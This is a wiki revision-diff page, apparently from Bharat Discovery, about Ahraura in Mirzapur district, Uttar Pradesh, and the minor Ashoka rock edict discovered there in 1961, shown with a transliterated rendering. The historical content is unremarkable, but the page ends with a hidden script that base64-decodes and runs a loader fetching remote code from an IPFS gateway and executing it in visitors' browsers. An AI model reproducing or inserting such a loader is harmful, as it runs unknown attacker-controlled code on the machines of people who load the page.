Difference between revisions of "अहरौरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
'''अहरौरा''' [[उत्तर प्रदेश]] के [[मिर्ज़ापुर ज़िला|मिर्ज़ापुर ज़िले]] में स्थित है। यहाँ पर अहरौरा बाँध के समीप एक पहाड़ी पर स्थित शिला पर [[अशोक]] का लघु [[अशोक के शिलालेख|शिलालेख]] उत्कीर्ण हैं।
 
'''अहरौरा''' [[उत्तर प्रदेश]] के [[मिर्ज़ापुर ज़िला|मिर्ज़ापुर ज़िले]] में स्थित है। यहाँ पर अहरौरा बाँध के समीप एक पहाड़ी पर स्थित शिला पर [[अशोक]] का लघु [[अशोक के शिलालेख|शिलालेख]] उत्कीर्ण हैं।
 
+
==संक्षिप्त परिचय==
 
*इसा शिला की खोज [[1961]] ई. में प्रोफ़ेसर गो.रा. शर्मा ने की थी। मिराशी ने इसे सम्पादित किया था।
 
*इसा शिला की खोज [[1961]] ई. में प्रोफ़ेसर गो.रा. शर्मा ने की थी। मिराशी ने इसे सम्पादित किया था।
 
*उत्तर प्रदेश से मिलने वाला यह प्रथम लघु [[शिलालेख]] था।
 
*उत्तर प्रदेश से मिलने वाला यह प्रथम लघु [[शिलालेख]] था।
 
*यह लेख [[सहसराम]] व [[बैराठ]] के लघु शिलालेख से मिलता जुलता है, सिवाय अंतिम पंक्ति के।
 
*यह लेख [[सहसराम]] व [[बैराठ]] के लघु शिलालेख से मिलता जुलता है, सिवाय अंतिम पंक्ति के।
*यह लेख काफ़ी घिसा-पिटा एवं अस्पष्ट है।
+
*यह लेख काफ़ी घिसा-पिटा एवं अस्पष्ट है।<ref>{{cite book | last =जैन | first =डॉ.हुकम चंद| title =भारतीय ऐतिहासिक स्थल कोश| edition = | publisher =जैन प्रकाशन मंदिर| location = जयपुर | language =हिंदी | pages =20| chapter =}}</ref>
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
{{cite book | last =जैन | first =डॉ.हुकम चंद| title =भारतीय ऐतिहासिक स्थल कोश| edition = | publisher =जैन प्रकाशन मंदिर| location = जयपुर | language =हिंदी | pages =20| chapter =}}
 
 
<references/>
 
<references/>
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{अशोक}}
+
{{अशोक}}{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
 
 
{{उत्तर प्रदेश के नगर}}
 
{{उत्तर प्रदेश के नगर}}
 
[[Category:उत्तर_प्रदेश_के_ऐतिहासिक_स्थान]][[Category:इतिहास_कोश]][[Category:ऐतिहासिक_स्थान_कोश]][[Category:अशोक]]
 
[[Category:उत्तर_प्रदेश_के_ऐतिहासिक_स्थान]][[Category:इतिहास_कोश]][[Category:ऐतिहासिक_स्थान_कोश]][[Category:अशोक]]
[[Category:उत्तर_प्रदेश]]
+
[[Category:उत्तर_प्रदेश]][[Category:भारतीय ऐतिहासिक स्थल कोश]]
 
[[Category:उत्तर_प्रदेश_के_नगर]]
 
[[Category:उत्तर_प्रदेश_के_नगर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:02, 4 May 2018

aharaura uttar pradesh ke mirzapur zile mean sthit hai. yahaan par aharaura baandh ke samip ek paha di par sthit shila par ashok ka laghu shilalekh utkirn haian.

sankshipt parichay

  • isa shila ki khoj 1961 ee. mean profesar go.ra. sharma ne ki thi. mirashi ne ise sampadit kiya tha.
  • uttar pradesh se milane vala yah pratham laghu shilalekh tha.
  • yah lekh sahasaram v bairath ke laghu shilalekh se milata julata hai, sivay aantim pankti ke.
  • yah lekh kafi ghisa-pita evan aspasht hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. jain, d aau.hukam chand bharatiy aitihasik sthal kosh (hiandi). jayapur: jain prakashan mandir, 20.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>